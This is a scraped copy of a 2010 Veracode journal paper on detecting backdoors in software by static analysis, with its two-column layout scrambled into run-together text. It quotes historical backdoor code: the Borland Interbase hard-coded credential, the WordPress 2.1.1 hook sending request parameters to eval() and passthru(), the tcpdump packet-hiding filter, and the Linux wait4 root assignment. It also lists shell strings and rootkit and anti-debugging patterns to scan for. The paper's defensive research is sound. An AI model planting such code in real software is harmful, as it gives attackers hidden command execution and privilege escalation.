Static Detection of Application Backdoors

1,230 views

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,230
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
14
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Static Detection of Application Backdoors

  1. 1. SCHWERPUNKTChris Wysopal, Chris Eng, Tyler ShieldsStatic Detection of Application BackdoorsDetecting both malicious software behavior and malicious indicators from the static analysis of executable codeBackdoors in legitimate software, whether maliciously inserted or carelessly introduced, are arisk that should be detected prior to the affected software or system being deployed.Automated static analysis of executable code can detect many classes of malicious behavior.This paper will cover the techniques that can be employed to detect special credentials,hidden commands, information leakage, rootkit behavior, anti-debugging, and time bombs. Introduction ing for rootkit behavior and anti-debug- ging functionality. If the analyzer finds Backdoors in legitimate software, wheth- these “anti-reverse engineering” patterns, Chris Wysopal er maliciously inserted or carelessly intro- further inspection should be performed to duced, are a risk that should be detected determine what the software is hiding. CTO and Co- prior to the affected software or system be- Founder of Vera- ing deployed. We call software and devic- code. He is vulnera- bility researcher and es that come with malicious functionality Technical Summary built in, “Certified Pre-Owned”. the author of „The Modern static analysis methods can de- Backdoors are a method of bypassing au- Art of Software Security Testing“ E-Mail: cwysopal@Veracode.com tect many classes of common vulnerabili- thentication or other security controls in ties. Static analyzers do this by building a order to access a computer system or the semantic model of the software which typ- data contained on that system. Backdoors Chris Eng ically includes control flow and data flow can exist at the system level, in a crypto- graphs. This model is then scanned for graphic algorithm, or within an applica- Senior Director of patterns that typically lead to vulnerabili- tion. We have concentrated on application Research at Vera- ties such as buffer overflows. Static analy- backdoors which are embedded within the code. He is respon- sis methods can also be targeted at detect- code of a legitimate application. We define sible for integrating ing code that offers backdoor functional- application backdoors as versions of legit- security expertise ity to an attacker who knows of its exis- imate software modified to bypass securi- and prioritize the security feature set tence. Binary static analysis has the pow- ty mechanisms under certain conditions. of Veracode‘s service erful capability of being able to use static These legitimate programs are meant to be offerings. E-Mail: ceng@Veracode.com analysis techniques when source code is installed and running on a system with not available, which is the typical case the full knowledge and approval of the when a consumer is concerned about de- system operator. Application backdoors Tyler Shields tecting a backdoor in a product they have can result in the compromise of the data purchased. and transactions performed by an applica- Senior Researcher Special credentials, hidden commands, tion. They can also result in system com- for the Veracode and unintended information leakage are a promise. Research Team few of the types of application backdoors Application backdoors are often insert- whose responsibili- that have been discovered in commercial ed in the code by someone who has legiti- ties include under- and open source software. Rules can be mate access to the code. Other times the standing and ex-amining security created for a static analyzer to inspect for source code or binary to an application is and attack methods for integration these patterns. Rules can also be created modified by someone who has compro- into the Veracode products. E-Mail: tshields@Veracode.com that inspect for evidence that someone is mised the system where the source code is hiding functionality in software by look- maintained or the binary is distributed.DuD • Datenschutz und Datensicherheit 3 | 2010 149
  2. 2. SCHWERPUNKTAnother method of inserting an applica- credential can be detected by looking for are in the form of a special username,tion backdoor is to subvert the compiler, static or computed values that do not come password, password hash, or key. The log-linker, or other components in the devel- from the authentication store yet allow au- ic is a comparison to the special credentialopment tool chain used to create the appli- thentication. or logic that inserts the special credentialcation binary from the source code. There are several categories of applica- into the designed credential store. An ob- Application backdoors are best detected tion backdoors which can be detected us- fuscation technique for this class of back-by inspecting the source code or statically ing automated static analysis: door is to compute the special credentialinspecting the binary. It is impossible to ƒ Special credentials from other data, either static or unique todetect most types of application backdoors ƒ Unintended network activity the application installation [5].dynamically because they use secret data ƒ Deliberate information leakage Example: Borland Interbase 4.0, 5.0, 6.0or functionality that cannot be dynami- Other constructions in the code that indi- was discovered to have a special credentialcally inspected for. cate that a backdoor or other malicious backdoor in 2001 shortly after the soft- Application backdoor analysis is imper- code is present can also be detected stati- ware was open sourced. The special cre-fect. It is impossible to determine the in- cally. These include: dentials, username “politically” and pass-tent of all application logic. Well known ƒ Embedded Shell Commands word “correct”, were inserted into the cre-backdoor mechanisms can be heavily ob- ƒ Time Bombs dential table at program startup. The sup-fuscated and novel mechanisms can cer- ƒ Rootkit-like Behavior port for user defined functions in the soft-tainly be employed. Another angle of de- ƒ Code or Data Anomalies ware equated this backdoor access withtection is to look for signs that the mali- ƒ Self-modifying Code system access. The backdoor went unde-cious actor is trying to hide their tracks ƒ Anti-debugging tected for seven years.with rootkit behavior, anti-debugging The design of a static binary analyzer to The following is the Borland Interbaseand/or code and data obfuscation tech- detect the preceeding consists of the fol- backdoor code:niques. lowing processes: In the past, backdoors in source code 1. Platform-Specific Front End – Prepare dpb = dpb _ string;have been detected quickly but backdoors all symbol information, procedures, en- *dpb++ = gds _ _ dpb _ version1;in binaries often survive detection for vironments, types, and other platform- *dpb++ = gds _ _ dpb _ user _ name;years. The Linux kernel “uid=0” backdoor specific information for disassembly *dpb++ = strlen (LOCKSMITH _ US-attempt was quickly discovered but the and transform. ER);Borland Interbase backdoor lasted for 2. Data Flow Transformer – Disassemble q = LOCKSMITH _ USER;many years until the software was open and import code. Convert low-level reg- while (*q) *dpb++ = *q++;sourced. For compiled software, a subvert- ister accesses into high-level variables.ed development tool chain or compro- Convert references to variable memory *dpb++ = gds _ _ dpb _ password _mised distribution site requires binary locations into high level alias form. enc;analysis for backdoor detection since the Propagate type information. strcpy (password _ enc,backdoor only exists after compilation or 3. Optimization – Reduce complexity of (char *)ENC _ crypt(LOCKSMITH _linking. In addition, modern development code by performing pattern-based and PASSWORD, PASSWORD _ SALT));practices often dictate the usage of frame- dataflow-based reductions, propaga- q = password _ enc + 2;works and libraries where only binary tions, substitutions and simplifications. *dpb++ = strlen (q);code is available. When backdoor reviews 4. Control Flow Transformer – Recon- while (*q) *dpb++ = *q++;are performed at the source code level struct high-level control flow from low-there are still significant portions of soft- level jumps and conditionals. Trans- dpb _ length = dpb – dpb _ string;ware that are not getting reviewed. For form ‘if/else’, ‘while/do/for’, ‘goto’, ‘try/these reasons we have chosen to imple- throw/catch’, ‘switch’. isc _ attach _ database (status _ment our static detection techniques on 5. Scan Process – Inspect the semantic vector, 0,binary executables. model of the software for certain con- GDS _ VAL(name), &DB, dpb _ By researching backdoors that have structs such as vulnerabilities, weak- length,been discovered, it is possible create rules nesses, and backdoors. dpb _ string);for a static analyzer to inspect for back- 6. Reporting – Generate report of defectsdoor behavior. An example is a “special with their location in the code. A static analysis technique that would in-credential” back door. This is when the dicate that there may be a backdoor in thissoftware has a special username, pass- example would be to inspect for usage ofword, password hash, or key that is em- Backdoor Detection the password crypt function that operatedbedded within the software. If an attacker Techniques on static data.knows that special credential they can au- Additional examples of backdoors thatthenticate to the software no matter what Special Credentials use special credentials are [5], [6], and [7].the contents of the authentication store. Detection Strategies: Identify staticThe static analyzer can inspect the crypto Special credential backdoors are a class of variables that look like usernames or pass-functions that are used by the authentica- application backdoor where the attacker words. Start with all static strings usingtion routine and the data flow graph that inserts logic and special credentials into the ASCII character set. Focus on stringconnects to these function calls. A special the program code. The special credentials comparisons as opposed to assignments or150 DuD • Datenschutz und Datensicherheit 3 | 2010
  3. 3. SCHWERPUNKTplaceholders. Also inspect known crypto Or in BSAFE: code. Hidden functionality is sometimesAPI calls where these strings are passed in combined with a check for a special IP onas plaintext data. B _ SetKeyInfo(B _ KEY _ OBJ the command issuer side so that there is Identify static variables that look like keyObject, B _ INFO _ TYPE some protection against everyone usinghashes. Start with all static strings using infoType, POINTER info) the backdoor.the character set [0-9A-Fa-f]. Narrow Example: In 2007 WordPress 2.1.1 wasdown to strings that correspond to lengths Perform a statistical test for randomness backdoored [10]. A WordPress distribu-of known hash algorithms such as MD5 on static variables. Data exhibiting high tion server was compromised and the dis-(128 bits) or SHA1 (160 bits). Focus on entropy may be encrypted data or key ma- tribution modified to add a backdoor. Twostring comparisons as opposed to assign- terial and should be inspected further [8] PHP files were modified to allow remotements or placeholders. Examine cross-ref- [9]. command injection through a hidden pa-erences to these strings. rameter in a web request. The modifica- Identify static variables that look like Hidden Functionality tion was detected within one week.cryptographic keys. Start with all static Shown below are the relevant portionscharacter arrays declared or dynamically Hidden functionality backdoors allow the of the PHP code that were inserted. Itallocated to a valid key length. Also iden- attacker to issue commands or authenti- reads the values of two parameters, “ix”tify static character arrays that are a mul- cate without performing the designed au- and “iz”, from the web request and passestiple of a valid key length, which could be thentication procedure. Hidden function- those values into one of two built-in PHPa key table. Narrow down to known cryp- ality backdoors often use special parame- functions, eval() or passthru(). The eval()to API calls where these arrays are passed ters to trigger special logic within the pro- function processes the input string as PHPin as the key parameter, for example in gram that shouldn’t be there. In web appli- code while passthru() executes a systemOpenSSL: cations these special parameters are often command. invisible parameters for web requests (notDES _ set _ key(const _ DES _ cblock to be confused with hidden fields). Other*key, DES _ key _ schedule *schedule) hidden functionality includes undocu- mented commands or left over debugDuD • Datenschutz und Datensicherheit 3 | 2010 151
  4. 4. SCHWERPUNKTfunction comment _ text _ or reads from a data structure containing str[0] = ‘0’;phpfilter($filterdata) { valid commands. if (!(!buf || !*buf)) { eval($filterdata); Identify comparisons with specific IP strcpy (str, buf);} addresses or DNS names. In C, start with strcat (str, “ and “);... all calls to socket API functions such as }if ($ _ GET[„ix“]) { comment _ getpeername(), gethostbyname(), and strcat (str, new);text _ phpfilter($ _ GET[„ix“]); } gethostbyaddr(). Comparisons against the buf = str; results of these functions are suspicious. }function get _ theme _ mcommand Don’t forget to look at ports as well. ($mcds) { passthru($mcds); This code inspects the user-supplied filter} Unintended Network Activity parameter and modifies it as follows. If the... user has explicitly specified port 1963, theif ($ _ GET[„iz“]) { get _ theme _ Unintended network activity is a common backdoor will modify the filter to sniff mcommand($ _ GET[„iz“]); } characteristic of backdoors. This may in- port 1964 instead. Otherwise, the string volve a number of techniques, including “and not port 1963” is appended to the us-A technique for discovering this particu- listening on undocumented ports, making er-selected filter. This is a crude techniquelar backdoor is no different than inspect- outbound connections to establish a com- and not particularly robust. For example,ing code for command injection vulnera- mand and control channel, or leaking sen- if the filter had been “port 1963 or port 80”bilities. First inspect for functions that call sitive information over the network via it would be rewritten as “port 1964”, and itthe operating system command shell and SMTP, HTTP, UDP, ICMP, or other pro- would be pretty obvious that somethingthen make sure no unfiltered user input is tocols. Any of these behaviors may be unusual was going on when no web trafficpassed to the function. combined with rootkit behavior in an at- was captured. Additional examples of backdoors that tempt to hide the network activity from lo- This particular backdoor was atypicaluse hidden functionality are [11], [12], [13], cal detection. because the C&C component depended onand [14]. Example: In 2002, a backdoor was in- the build process to install itself as a sepa- Detection Strategies: Recognize com- serted into the source code distribution of rate executable; however, the same func-mon patterns in scripting languages: Cre- tcpdump [15], a common Unix-based net- tionality could have just as easily been em-ate an obfuscated string, input into deob- work sniffer. The backdoor contained two bedded into the main tcpdump codebase.fuscation function (commonly Base64), components, an outbound command and Additional examples of backdoors thatcall eval() on the result of the deobfusca- control (C&C) channel in conjunction generate unintended network activity aretion. Payload code often allows command with a modification to the sniffer itself to [16], [17], and [18].execution or auth bypass. hide selected packets. The C&C compo- Detection Strategies: Backdoors that re- The following Google Code Search que- nent was installed as a separate program ly on network behavior are most common-ry will locate this common PHP obfusca- that is compiled and executed as part of ly detected dynamically using various net-tion technique: the build process. When run, it established work utilities, both on the affected hosthttp://www.google.com/codesearch an TCP connection to a hard-coded IP ad- and upstream. However, static detection is?hl=en&lr=&q=eval%5C%28base64 _ dress on port 1963 and listened for com- also possible if one understands the typi-decode+file%3A%5C.php%24&btnG=Search mands, which were represented as single cal patterns of behavior. A benefit of stat- characters – “A” to kill itself, “D” to spawn ic analysis for unintended network behav-Identify GET or POST parameters parsed a shell and redirect I/O over the socket, ior detection is in cases where the back-by web applications then compare them to and “M” to sleep for one hour. The sniffer door only exhibits the behavior at certainform fields in HTML and JSP pages to find component modified tcpdump’s gencode.c times.fields that only appear on the server side. file to modify the traffic filter as shown Identify inbound and outbound con- Identify potential OS command injec- below: nections. Regardless of platform or lan-tion vectors. In C, look for calls to the ex- guage, there are usually a set of standardec() family and system(). In PHP, use stan- int l; API functions responsible for handlingdard code review techniques such as look- char *port = “1963”; network communications. For C/C++ing for popen(), system(), exec(), shell_ex- char *str, *tmp, *new = “not port programs on Unix platforms these resideec(), passthru(), eval(), backticks, fopen(), 1963”; in the libc package; Windows supportsinclude(), or require(). Then analyze data these as well but extends them withflow to check for tainted parameters. if (buf && *buf && strstr (buf, Win32-specific APIs. Start by identifying Identify static variables that look like port)) { all locations in the codebase that call func-application commands. Start with all stat- buf = “port 1964”; tions responsible for establishing connec-ic strings using the ASCII character set } else { tions or sending/receiving connectionless(depending on the protocol, hidden com- l = strlen (new) + 1; data, such as connect(), bind(), accept(),mands might not be human-readable if (!(!buf || !*buf)) { sendto(), listen() and recvfrom(). Oncetext). Focus on string comparisons as op- l += strlen (buf); these calls have been identified, pay par-posed to assignments or placeholders. l += 5; /* and */ ticular attention to any outbound networkCheck the main command processing } activity that reference a hard-coded IP ad-loop(s) to see if it uses direct comparisons str = (char *)malloc (l); dress or port. For anything that looks sus-152 DuD • Datenschutz und Datensicherheit 3 | 2010
  5. 5. SCHWERPUNKTpicious, analyze the data flow to deter- Manipulation of Security-Critical havioral patterns rather than the variablesmine what type of information is being Parameters themselves.sent out. For inbound activity, some Take the Linux backdoor attempt as anknowledge of the normal application traf- In any program, certain variables or pa- example. In order to be subtle, the attack-fic will be required to determine which rameters are more significant than others er disguised a backdoor as a common pro-ports are unauthorized listeners. A J2EE from a security standpoint. In operating gramming flaw, using an assign instead ofapplication server, for example, opens a system code, these could be parameters a compare. Static analysis could be used tonumber of ports for backend communica- that assign certain privileges to a process, identify all instances of this behavior andtion. Keep in mind that many applications influence task scheduling, or restrict op- then inspect each one manually. The scanhave functionality built in to automatical- erations on memory pages. In application would need to be tuned to take into ac-ly check for updates, so seeing at least one code, consider variables used to store the count situations where an assignmenthard-coded outbound connection is not results of authentication or authorization within a conditional is intended, since thisuncommon. functions, or other security mechanisms. is a common idiom in C/C++. For exam- Identify potential information leaks. In By directly manipulating these parame- ple:addition to the obvious step of examining ters or introducing flawed logic to com-filesystem and registry I/O, cryptograph- parisons against them, an attacker may be if ((foo == 1) && (bar = mallocic APIs can be a useful starting point to able to disrupt the program in a way that (BAR _ SIZE)) { do _ something _identify locations where sensitive data may is advantageous to someone who under- useful();reside. Start by identifying all locations stands how to trigger it. }where known cryptographic APIs are Example: In 2003, an attempt was madeused. For example, a program that uses the to backdoor the Linux 2.6 kernel [2]. The In this case, the assignment in the condition-OpenSSL implementation of Blowfish maintainers noticed and removed the al is used to check the return value of mal-should call BF_set_key() to initialize the backdoor before end users were ever af- loc(), which is NULL on failure. The scanencryption key and either BF_cbc_en- fected. This was due in part to the fact that could be refined by only flagging condition-crypt() or one of the other BF_ functions the attacker directly modified the CVS als contains an assignment where the right-to encrypt/decrypt data. Within these tree rather than committing a change via hand side is either a constant or a functionfunction calls, determine which parame- the usual mechanism. Even though the that always returns the same value.ters contain sensitive data such as keys or malicious code never made it to a shipping It could also be useful to examine logicplaintext data. Then, analyze the data kernel, it provided valuable insight into a expressions in security-critical sections orflows for these variables to locate other very subtle backdoor technique. The code expressions that reference security-relatedplaces in the code where they are refer- snippet show here is all that was added to API calls. Short-circuited compound con-enced. Certain use cases are safe, for ex- the sys_wait4() function of kernel/exit.c: ditionals or expressions that always evalu-ample, strlen(), bzero(), and memset(). ate to the same value should be examinedHowever, if these pieces of data are passed if ((options == ( _ _ WCLONE| _ _ in more detail. An example of the latterinto network functions or even file I/O, WALL)) && case, as seen in a recent vulnerability in thefurther exploration may be warranted. (current->uid = 0)) X.Org Window Server [19], is shown here: Profile binaries by examining import retval = -EINVAL;tables. Source code may not always be if (getuid() == 0 || geteuid != 0)available. However, it is still possible to ap- The intended functionality of the wait4() {ply static analysis techniques to under- system call is to allow the caller to wait on if (!strcmp(argv[i],stand the application profile. Compiled a specified child process to change state. “-modulepath”)) {applications contain import tables which At first glance, this modification appears /* allow arbitraryinform the process at run-time where to to simply abort the system call if the pro- modules */find the implementation of library func- cess has certain flags set and is running as }tions. A variety of open-source or freeware root. However, upon closer examination, }tools can be used to parse import tables the second half of the conditional actual- While the intention of the conditional is toand display a list of the imported func- ly assigns current->uid to zero rather than only process the -modulepath option if thetions. Some popular tools are readelf, ob- comparing it with zero. As a result, the user is root or the process is running as ajdump, and nm on Unix platforms, or PE- calling process is granted root privileges if non-root user, the expression is flawed be-Dump and PEBrowse on Windows plat- it calls wait4() with the _WCLONE and _ cause it uses the geteuid function pointerforms. WALL options set. rather than the return value of geteuid(). The purpose of profiling is simply to Detection: This is a difficult category to This is a scenario where the second half ofidentify anomalies, such as the use of net- detect, partly due to the vast number of se- the expression would always evaluate towork APIs by an application that should curity-critical parameters to consider. true because the geteuid function wouldbe client-side only, such as a text editor. If One technique would be to create a list of never be loaded at memory address 0. It isanomalies are found, then proceed to an- these “interesting” variables and examine likely that this example was an implemen-alyze the binary in more depth, using a each and every reference. However, this is tation vulnerability rather than a back-disassembler to trace the code paths to the likely to be too time-consuming. It may door, though there is no way to be certain.suspicious calls. make more sense to focus on known be- Interestingly, both the Linux kernel and X.Org examples should be detectable byDuD • Datenschutz und Datensicherheit 3 | 2010 153
  6. 6. SCHWERPUNKTrelatively unsophisticated source code behavior is a backdoor that opens up a net- Anti-Debuggingscanners. In fact, they may even be flagged work port listening for incoming connec-by the compiler, if warnings are not sup- tions and also modifies the OS functions Anti-debugging is the implementation ofpressed. that list listening network ports. Anti-de- one or more techniques within computer bugging is an approach that makes run- code that hinders attempts at reverse engi- Additional Detection Techniques time inspection of the running code diffi- neering or debugging a target binary. cult. If the backdoored software can stop These techniques are used by commercialThere are a number of other suspicious be- a debugger from single stepping through executable protectors, packers, and mali-haviors that may be indicative of applica- the code or inspecting internal data struc- cious software, to prevent or slow-downtion backdoors but either do not fall into tures it makes it difficult to determine if the process of reverse-engineering. Scansany of the previously described categories the software has unwanted backdoor can be implemented for generic and tar-or could potentially span multiple catego- functionality at execution time. Time geted anti-debugging and anti-tracingries. These may include embedded shell bombs thwart dynamic analysis be trig- techniques.commands, time bombs, rootkit-like be- gering malicious behavior at a particular The most straightforward method ofhavior, self-modifying code, code or data absolute time such as on the 15th day of anti-debugging uses operating systemanomalies, and Linux-specific network fil- the month or on an interval such as week- provided API functions to determine theters. ly. Dynamic analysis has to occur over an existence or operation of a debugger. Some exceedingly long period to detect a time of the API calls are documented features Embedded Shell Commands bomb. provided by the operating system itself, One of the solutions to this challenge we while others are unpublished functionsThis is an obvious technique but surpris- propose is to look directly for the code that that can be linked at runtime from variousingly effective. Simply grep through implements the anti-debugging, rootkit be- system DLL files. Other anti-debuggingsource files or run ‘strings’ or a similar havior, or time bomb using static analysis. techniques that can be scanned for in-utility against the compiled binary to lo- clude:cate any hard-coded instances of ASCII Rootkit Behavior ™ FindWindowstrings such as “/bin/sh”, “/bin/ksh”, “/bin/ ™ Debugger Registry Key Detectioncsh”, etc. One benefit of scanning the bi- The following are some common tech- ™ ProcessDebugPort Detectionnary in this case is that character arrays niques that rootkits use to hide their be- ™ Debugger Detachingare more readable. Consider this fragment havior from the instrumentation a reverse ™ Self-Debuggingof source code: engineer or system administrator might ™ ProcessDebugFlags use. These techniques include: DLL injec- ™ ProcessDebugObjectHandlestatic char cmd[] = tion, IAT hooking, and Inline function ™ INT 2D Debugger Detection “x2fx62x69x6e” hooking. A scan rule can be created for ™ INT3 Exception Detection “x2fx73x68”; each coding patterns such that a static an- ™ Single Step Detection alyzer can search for the pattern in the ™ Ctrl-C Vectored Exception HandlingWhen the hex characters are interpreted, code. ™ ICE Breakpoint 0xF1the string is simply “/bin/sh”. However, a DLL Injection can be used for many le- ™ VMware Detectionscan of source code might not pick this up gitimate purposes; however its usage is a [27][28][29][30][31]if it was searching for the ASCII represen- red flag that should cause the applicationtation. Other methods of hiding embed- metadata to be analyzed. If the scanned Time Bombsded command strings from the casual ob- application is intended to inject DLLs intoserver include simple obfuscation such as external processes then there is a chance A time bomb or logic bomb may be usedBase64, Uuencode, ROT-N, or XOR. these are false positive returns; however if by a backdoor to initiate a malicious action the scanned application should not be ex- at a certain time, or when certain condi- ecuting DLL injection of any manner, pos- tions are met. Time bombs can usually be Looking for Backdoor itive hits on these scan tests are highly detected by examining calls to standard Indicators likely to be indicative of a rootkit or sub- date/time API functions, such as time(), versive function. The following are some ctime(), gmtime(), localtime(), or theirBackdoor indicators are evidence that the techniques of DLL injection that can be thread-safe variants. Again, the Win32software is trying to hide its behavior from detected: and other platform APIs provide a num-dynamic run time detection. ™ Via the Registry ber of additional date/time functions. Three categories of backdoor indicators ™ Using Windows Hooks Once calls to these functions have beenthat are designed to evade detection by ™ Using Remote Threads identified, analyze how the results are be-run time analysis are rootkit behavior, an- ™ Thread Suspend and Hijack ing used to determine if certain values re-ti-debugging, and time bombs. Rootkit ™ IAT Hooking sult in different code paths.behavior modifies the operations of the ™ Inline Function Hooking Keep in mind that most of the time,operating system the software is running [20][21][22][23][24][25][26] these functions will be called for eitheron so that instrumentation and system ad- logging purposes, execution time calcula-ministration tools cannot detect the back- tions, or simply to generate protocol time-door functionality. An example of rootkit stamps. For example, HTTP includes the154 DuD • Datenschutz und Datensicherheit 3 | 2010
  7. 7. SCHWERPUNKT [15] Various, “Latest libpcap & tcpdump sources current system time in every server-gen- could be compromised but your scanner from tcpdump.org contain a Trojan”, Houstonerated response. It is branching based on as well. Linux Users Group, http://www.hlug.org/tro-the absolute time or a time difference that jan/, Nov. 2002.is suspicious. [16] Ercoli, Luca, “Etomite Content Management References System security advisory”, http://www.lucaer- coli.it/advs/etomite.txt, Jan. 2006. Conclusion [1] Thompson, Ken, “Reflections on Trusting Trust”, Communication of the ACM Vol. 27, [17] US-CERT, “CERT® Advisory CA-2002-24 Trojan Horse OpenSSH Distribution”, US-CERT Vul- No. 8, http://www.acm.org/classics/sep95/, nerability Database, http://www.cert.org/Application backdoors do not require Sep. 1995. advisories/CA-2002-24.html, Aug. 2002.much sophistication to create and there is [2] Andrews, Jeremy, “Linux: Kernel ‚Back Door‘ [18] Song, Dug, “Trojan/backdoor in fragroute 1.2 ample motivation for bad actors to create Attempt”, KernelTrap, http://kerneltrap.org/ source distribution”, Virus.Org Mailing List Ar-them. Backdoors are trivial to exploit once node/1584, Nov. 2003. chive, http://lists.virus.org/bugtraq-0205/the word gets out so response must be very [3] Poulsen, Kevin, “Borland Interbase backdoor msg00276.html, May 2002.quick. The negative reputation impact to exposed”, The Register, http://www.theregis- [19] Various, “X.Org X Window Server Local Privi- ter.co.uk/2001/01/12/borland_interbase_ lege Escalation Vulnerability”, Security Focus, the vendor of the effected software is often backdoor_exposed, Jan. 2001. http://www.securityfocus.com/archive/1/ar-much higher than the negative impact [4] Reifer Consultants presentation at Oct 2007 chive/1/428183/100/0/threaded, Mar. 2006.from a typical vulnerability. A vulnerabil- DHS SwA Forum [20] Marsh, Kyle, “Win32 Hooks”, Microsoft Devel-ity is perceived as a mistake but losing con- [5] Oblivion, Brian, “NetStructure 7110 console oper Network, http://msdn2.microsoft.com/trol of one’s development or distribution backdoor”, Bugtraq mailing list, http://se- en-us/library/ms997537.aspx, Feb. 1994.environment is thought to be incompe- clists.org/bugtraq/2000/May/0114.html, May [21] Ivanov, Ivo, “API Hooking Revealed”, The Codetence. 2000. Project, http://www.codeproject.com/sys- [6] Cerberus Security Team, “Cart32 secret pass- tem/hooksys.asp, Dec. 2002. The list of techniques a programmer word backdoor”, Neohapsis Archives, http:// [22] SysSpider, “The Win32 API For Hackers”, http://can use to hide from runtime analysis con- archives.neohapsis.com/archives/ sysspider.vectorstar.net/papers/api4hackers.tinues to grow as new methods are found win2ksecadvice/2000-q2/0048.html, Apr. txt, unknown date.over time. Like most areas of security re- 2000. [23] Butler, James, “VICE – Catch the Hookers”, search this is a classic cat and mouse game. [7] Tarbatt, Dave, “APC 9606 SmartSlot Web/ BlackHat USA 2004, http://www.blackhat.Rootkit techniques are a fertile ground of SNMP Management Card Backdoor”, Secu- com/presentations/bh-usa-04/bh-us-04-but-research and new operating systems and riTeam Security News, http://www.securite- ler/bh-us-04-butler.pdf, Aug. 2004.VMs give additional debugging opportu- am.com/securitynews/5MP0E2AC0M.html, [24] Kruegel, Christopher et al, “Detecting Kernel- Feb. 2004. Level RootkitsThrough Binary Analysis”, 20thnities that the ant-reverse engineer will [8] Lyda, Robert et al, “Using Entropy Analysis to Annual Computer Security Applicationswant to thwart. The list is long and grow- Find Encrypted and Packed Malware”, IEEE Se- Conference, http://www.cs.ucsb.edu/~wkr/ing. However, when a new technique is curity and Privacy, http://csdl2.computer.org/ publications/acsac04lkrm.pdf, May 2004.discovered it is relatively easy to add a scan persagen/DLAbsToc.jsp?resourcePath=/dl/ [25] Bioforge, “Hacking the Linux Kernel Network or check for the pattern with a rules based mags/sp/&toc=comp/mags/sp/2007/02/ Stack”, Phrack Magazine Issue 61, http://static analyzer. Binary static analysis is up j2toc.xml&DOI=10.1109/MSP.2007.48, Apr. www.phrack.org/issues.to the task of looking for the tell tale signs 2007. html?issue=61&id=13, Aug. 2003. [9] Carrera, Ero, “Scanning data for entropy [26] Rutkowska, Joanna, “Linux Kernel Backdoors that a program is trying to hide its behav- anomalies”, nzight blog, http://blog.dkbza. And Their Detection”, IT Underground 2004, ior from a reverse engineer which is often org/2007/05/scanning-data-for-entropy- http://invisiblethings.org/papers/ITUnder a tip off that something unwanted is hid- anomalies.html, May 2007. ground2004_Linux_kernel_backdoors.ppt, den in the software. [10] Boren, Ryan, “WordPress source code com- Oct. 2004. These factors add up to a need for soft- promised to enable remote code execution”, [27] Danny Quist and Val Smith, http://www.of-ware developers to become apprised of LWN.net, http://lwn.net/Articles/224999/, fensivecomputing.net/files/active/0/vm.pdf backdoor techniques and to expend re- Mar. 2007. [28] Josh Jackson, http://www.codeproject.com/sources on backdoor detection. We rec- [11] US-CERT, “CERT® Advisory CA-1994-14 Trojan KB/security/AntiReverseEngineering.aspx, Horse in IRC Client for UNIX”, US-CERT Vulner- Nov. 2008ommend that developers scan the code ability Database, http://www.cert.org/advi- [29] Nicolas Falliere, http://www.securityfocus.they are developing or maintaining before sories/CA-1994-14.html, Oct. 1994. com/infocus/1893, Sept. 2007release. Binary code, whether a standalone [12] Heise Security News, “Backdoor in Artmedic [30] Michael N. Gagnon et al, http://ieeexplore.application or a library that is linked into CMS”, http://www.heise-security.co.uk/ ieee.org/Xplore/login.jsp?url=/an application should be scanned for back- news/89835, May 2007. iel5/8013/4218538/04218560.pdf?temp=x, doors as part of the acceptance testing [13] Zielinski, Mark, “ID games Backdoor in quake”, June 2007process. Finally, as no discussion of back- insecure.org, http://insecure.org/sploits/ [31] Nicolas Brulez, http://www.codebreakers- quake.backdoor.html, May 1998. journal.com/downloads/cbj/2005/doors would be complete without follow- [14] Various, “TCP Wrapper Backdoor Vulnerabili- CBJ_2_1_2005_Brulez_Anti_Reverse_Engi-ing the advice of Ken Thompson’s classic ty”, Security Focus, http://www.securityfocus. neering_Uncovered.pdf, March 2005paper, “Reflections on Trusting Trust” [1], com/bid/118/discuss, Jan. 1999.scan your binaries using an independenttrusted scanner as not only your tool chainDuD • Datenschutz und Datensicherheit 3 | 2010 155

×